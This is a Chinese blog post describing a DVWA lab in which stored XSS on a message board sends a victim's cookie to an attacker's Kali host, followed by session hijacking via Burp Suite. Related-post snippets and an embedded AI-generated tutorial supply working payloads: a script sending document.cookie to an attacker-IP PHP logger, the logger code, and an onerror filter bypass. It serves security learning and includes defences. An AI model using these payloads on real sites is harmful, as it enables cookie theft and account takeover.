跨站脚本攻击XSS 获取cookie (low)

最新推荐文章于 2025-06-14 00:08:08 发布
原创 最新推荐文章于 2025-06-14 00:08:08 发布 · 3.7k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入解析XSS(跨站脚本)攻击原理,包括存储型XSS与反射型XSS的区别,通过实验演示如何利用存储型XSS获取用户Cookie信息,并提供防范措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS

跨站脚本攻击(Cross-site scripting),简称XSS(为区分CSS),它是一种迫使 Web 站点回显可执行代码的攻击技术。
XSS分为存储型XSS(Stored XSS)和反射型XSS(Reflected XSS)

存储型XSS

思路:
黑客在服务器的某一个留言板上留言了一条可以执行的语句(这是一条命令),这条语句上有黑客的IP地址,普通用户去访问这个网站,一旦打开了留言板的页面,就等于执行了这条命令,中招了,它会把自己的cookie信息发送给黑客,黑客知道了cookie信息以后就可以登录受害者的帐号,然后为所欲为。

XSS实验

首先
Kali(渗透机),XP(肉鸡),OWASP(服务器)能互相ping通
Kali为10.10.10.134,XP为136,OWASP为129

将security设置为low(低安全级别并没有对message做相应的检查)
在这里插入图片描述

在Kali中,创建cookie.php文件,编辑
在这里插入图片描述在这里插入图片描述
修改好后Esc 然后:wq 保存

在这里插入图片描述
然后选择 XSS srored(存储型XSS),在上面写上代码。
这可以理解为网页的留言板块,黑客把一条可以执行的语句放了上去,其中10.10.10.134便是Kali的IP,此时Kali登录的是admin帐号.(小心自己也会中招哈哈哈,自己点进去的话也会GG的,需要Setup)

注意,此时肉鸡上线了~
XP使用自己的帐号登录,然后点进去了XSS stored里,然后就卡住了。
就好比一位无辜的受害者,点进去了某个有留言板块的页面,然后就中招了,很无辜- -
在这里插入图片描述

此时打开Kali上的access.log文件
在这里插入图片描述
在这里插入图片描述
然后XP的cookie信息就在这里了。
渗透机获取cookie信息以后,使用代理,打开burpsuite 将cookie信息替换掉,便可以冒冲XP用户去访问服务器,为所欲为。

如何防范XSS?

网站开发者

1.输入验证
2.强壮的输出编码
3.明确指出输出的编码方式( ISO 8859-1 或 UTF 8)
4.注意黑名单验证

网站用户

1.不要直接点击链接,只从官方网站获取你希望浏览的页面内容。
2.将安全级别设置为“高”。

XSS获取COOKIE
04-20
XSS获取COOKIE
XSS获取cookie并利用
kuxing100的专栏
07-11 1884
获取cookie利用代码cookie.asp xx msg = Request("msg")   //获取提交过来的msg变量,也就是cookie值 set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象 set thisfile = fs.OpenTextFile(t
网络安全防护:跨站脚本攻击XSS
xike1024的博客
06-14 953
XSS:攻击者将恶意的客户端脚本(通常是 JavaScript)注入到其他用户会访问的网页中。当受害者的浏览器加载并执行了这些恶意脚本时,攻击就成功了
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 2591
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
XSS跨站获取cookie
weixin_34290096的博客
03-09 308
测试环境:hacker端 and victim端1,hacker端(hacker.php)的程序内容如下:<?php$cookie=$_GET['cookie'];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序内容如下:<...
cookie获取xss
baidu_41942652的博客
04-28 493
首先打开pikachu平台,找到反射型xss(get)章节。 打开后台 登录账号 将字数限制去掉 然后输入一个的script语句 然后可以在后台看见用户访问的cookie信息 这样一次cookie获取就成功了! ...
XSS漏洞(跨站脚本攻击
2301_76622364的博客
12-18 1254
XSS类型存储型反射型DOM型触发过程构造xss脚本后正常用户访问携带xss脚本页面正常用户访问携带xss脚本的URL正常用户访问携带xss脚本的url数据存储数据库URLURL谁来输出后端web应用程序后端web应用程序前端Javascript输出位置http响应中http响应中动态构造的DOM节点是否持久是否否。
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4952
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1814
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储型XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
跨站脚本攻击XSS演示(burpsuite)
qq_45070118的博客
07-31 3955
XSS简介 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的 通过web站点漏洞,向客户端交付恶意脚本代码,实现对客户端的攻击,事...
xss攻击突破转义_XSS 跨站脚本攻击总结
weixin_39881802的博客
11-21 642
漏洞起因可以输入的地方没有做好对应的过滤,引发的xss攻击漏洞危害盗取cookie劫持用户浏览器钓鱼攻击挂马在一定的条件下可以getshell会话劫持漏洞类型反射型XSS(危险级别:低),插入的语句停留在当前页面。DOM型XSS (危险级别:中), DOM型xss又分为两种 (a.可见型、b.不可见型),插入的语句影响js 。存储型XSS(危险级别:高),插入的语句保存在数据库 。其他型XSS(例...
04-xss获取cookie实验
tianxiadiiw的博客
05-06 650
攻击者服务器:192.168.74.134,将获取cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。正常Web服务器:192.168.74.133,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。但是只有几分钟的时间进行操作,期间可以查看数据库,建立用户,用户向管理员举报有问题的页面,管理员前去访问,攻击者则直接获取到了管理员的cookie。攻击者在回帖中输入文章内容,并加入JavaScript开始进行xss攻击,3、获取管理员 Cookie
XSS攻击——cookie
qq_46277212的博客
06-23 1997
cookie概述 cookie是一些数据,存储于用户电脑上的文本文件中。当web服务器向浏览器发送web页面时,在连接关闭后,服务器不会记录用户的信息。cookie的作用就是用于解决“如何记录客户端的用户信息”。 当用户访问web页面时,用户名可以记录在cookie中。 在用户下一次访问该页面时,可以在cookie中读取用户访问记录。 cookie以键值对形式存储。如 username=baixiaomao; 当浏览器从服务器上请求web页面时,属于该页面的cookie会被添加到该请求中。服务器端通过
cookiexss攻击、WebStorage
tx_blogs的博客
08-06 270
cookie cookie的定义 cookie实际上就是一些信息,这些信息以文件的形式存储在客户端计算机上。当用户访问了某个网站,可以通过cookie向访问者电脑上存储数据 cookie就是页面用来保存信息,比如自动登录,用户名 cookie作用 cookie的主要作用是保存信息,并与服务器互动,因此在很多情况下都可以使用到cookie。 密码 cookie:访当问者首次访问页面时,也许会填写密码。密码也可被存储于 cookie 中。当他们再次访问网站时,密码就会从 cookie 中取回
使用Http-only Cookie来防止XSS攻击
yuhan_9204的专栏
06-21 6366
有些网站考虑到这个问题,所以采取浏览器绑定技术,譬如将Cookie和浏览器的User-agent绑定,一旦发现修改就认为Cookie失效。但是这种方法存在很大的弊端,因为当入侵者偷得Cookie的同时他肯定已经同时获得了User-agent。还有另外一种比较严格的是将Cookie和Remote-addr相绑定(其实就是和IP绑定),但是这样有可能带来比较差的用户体验,比如家里的ADSL就是每次连接
XSS另类攻击()在线平台监控Cookie
05-19 1029
XSS另类攻击()在线平台监控Cookie,实现权限维持。
XSS ———— (二)利用反射型XSS窃取用户Cookie信息并利用
weixin_43102772的博客
02-27 1249
思路: 搭建能接收cookie的服务器 构建带有XSS恶意代码的url 发给用户诱导用户点击url 获得用户cookie并利用 实验环境: kali————充当攻击者接收cookie的服务器 192.168.0.53 DVWA————充当客户要访问的目标网站 centos7————充当用户客户端 小试牛刀: 一、搭建服务器 1. kali开启Apache服务 systemctl start a...
Cookie如何防范XSS攻击
liuhao9999的博客
03-22 4251
XSS跨站脚本攻击)是指攻击者在返回的HTML中嵌入javascript脚本,为了减轻这些攻击,需要在HTTP头部配上,set-cookie: httponly-这个属性可以防止XSS,它会禁止javascript脚本来访问cookie。 secure - 这个属性告诉浏览器仅在请求为https的时候发送cookie。 结果应该是这样的:Set-Cookie=..... ......
php反射型xss,利用反射型XSS漏洞,模拟获取登录账户的Cookie
weixin_39819152的博客
04-01 904
目录结构一、测试环境二、测试目标三、原理描述四、操作步骤1.在服务器上搭建并启用hacker测试网站2.在服务器上测试站点根目录内创建一个存放攻击脚本的文件夹3.在xss文件夹下创建攻击脚本、cookie存储文件4.浏览器客户端向服务端提交特殊构造的XSS攻击脚本5.检查服务端获取到的cookie信息6.验证服务端获取到的cookie的有效性一、测试环境:PhpStudy+DVWA二、测试目标:从...
XSS跨站脚本攻击,用卡利完成。
最新发布
07-01
<think>我们正在讨论的是KaliLinux上进行XSS跨站脚本攻击的教程。根据引用内容,XSS攻击分为反射型、存储型和DOM型,而实践环境通常使用DVWA(Damn Vulnerable WebApplication)靶机。下面将分步骤说明如何在Kali Linux上搭建DVWA并进行XSS攻击实验。 ###步骤1:安装Kali Linux并更新系统确保你已安装KaliLinux。打开终端,执行以下命令更新系统:```bashsudoapt update&& sudoapt upgrade-y```###步骤2:安装必要的软件DVWA需要Web服务器(如Apache)、数据库(如MySQL)和PHP支持。在KaliLinux上安装LAMP环境: ```bashsudo aptinstall apache2mysql-serverphp libapache2-mod-phpphp-mysql -y``` ###步骤3:启动Apache和MySQL服务```bashsudo systemctl startapache2sudo systemctl startmysql``` ###步骤4:配置MySQL数据库运行安全脚本并设置root密码(按提示操作):```bashsudomysql_secure_installation``` 登录MySQL,创建DVWA数据库和用户:```bashsudomysql -u root-p```在MySQL提示符下执行:```sqlCREATEDATABASEdvwa; CREATEUSER 'dvwa'@'localhost'IDENTIFIED BY'password'; GRANT ALLPRIVILEGES ONdvwa.* TO'dvwa'@'localhost';FLUSHPRIVILEGES;exit;``` ###步骤5:下载并配置DVWA下载DVWA:```bashcd/var/www/htmlsudogit clonehttps://github.com/digininja/DVWA.git```设置权限: ```bashsudo chown -R www-data:www-dataDVWAsudochmod-R755DVWA```###步骤6:配置DVWA数据库连接复制配置文件模板: ```bashcd DVWA/configsudocp config.inc.php.dist config.inc.php``` 编辑`config.inc.php`,修改数据库连接信息:```php$_DVWA['db_user'] ='dvwa';$_DVWA['db_password'] ='password'; ```###步骤7:访问DVWA并初始化在浏览器中打开:`http://localhost/DVWA/setup.php`,点击“Create/ResetDatabase”按钮初始化数据库。默认登录凭证:`admin`/`password`。 ###步骤8:进行XSS攻击实验以反射型XSS为例: 1.在DVWA左侧选择“XSS Reflected”。2.在输入框中尝试注入脚本,例如:`<script>alert(document.cookie)</script>`。 3.提交后,如果页面弹出包含cookie的警告框,说明攻击成功。 存储型XSS(在留言板等处注入)和DOM型XSS(通过修改URL参数触发)实验方法类似,但需注意DVWA的安全级别设置(可在DVWA中调整)。###注意事项-实验仅在本地环境进行,切勿对未授权网站进行测试。 -理解每种XSS类型的原理和防御措施。§§相关问题§§1.如何防御XSS攻击? 2. DVWA中如何调整安全级别?3.除了DVWA,还有哪些常用的Web安全实验靶场?</think>### Kali Linux上进行XSS跨站脚本攻击的实践教程 XSS攻击通过在目标网站注入恶意脚本窃取用户信息或执行恶意操作[^1]。以下是在Kali Linux环境下进行XSS攻击实验的完整步骤: --- #### **一、环境准备** 1. **安装Kali Linux** 确保已安装最新版Kali Linux(推荐2023.x+版本) 2. **安装必要工具** ```bash sudo apt update sudo apt install apache2 php mysql-server git -y ``` 3. **启动服务** ```bash sudo systemctl start apache2 mysql ``` --- #### **二、搭建DVWA靶机** DVWA(Damn Vulnerable Web App)是专为安全测试设计的漏洞环境[^2]: ```bash cd /var/www/html sudo git clone https://github.com/digininja/DVWA.git sudo chown -R www-data:www-data DVWA ``` 1. 访问 `http://localhost/DVWA/setup.php` 2. 点击 **Create/Reset Database** 初始化数据库 3. 登录账号:`admin`/`password` > 在DVWA安全设置中调整难度为 **LOW**:`DVWA Security -> Low` --- #### **三、XSS攻击实践** ##### **1. 反射型XSS**(非持久化攻击) ```bash # 访问XSS测试页面 http://localhost/DVWA/vulnerabilities/xss_r/?name=<script>alert(1)</script> ``` 当参数`name`被注入恶意脚本时,浏览器会执行弹窗[^3]。 ##### **2. 存储型XSS**(持久化攻击) 1. 进入DVWA的 **XSS Stored** 模块 2. 在留言板输入: ```html <script>alert(document.cookie);</script> ``` 3. 提交后,所有访问该页面的用户都会触发脚本泄露cookie ##### **3. DOM型XSS** ```bash # 构造恶意URL http://localhost/DVWA/vulnerabilities/xss_d/?default=<script>alert("DOM XSS")</script> ``` --- #### **四、实战技巧** 1. **窃取Cookie** 使用真实攻击脚本: ```html <script>new Image().src="http://攻击者IP/cookie.php?c="+document.cookie;</script> ``` 在攻击机创建`cookie.php`: ```php <?php file_put_contents("stolen_cookies.txt", $_GET['c']); ?> ``` 2. **防御绕过** 当过滤`<script>`标签时尝试: ```html <img src=x onerror=alert(1)> ``` --- #### **五、防御建议** 1. 输入输出过滤(如HTML实体编码) 2. 使用CSP(Content Security Policy) 3. 设置HttpOnly Cookie标志 > ⚠️ **法律声明**:本教程仅用于授权环境的安全学习,未经授权的攻击行为违法。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值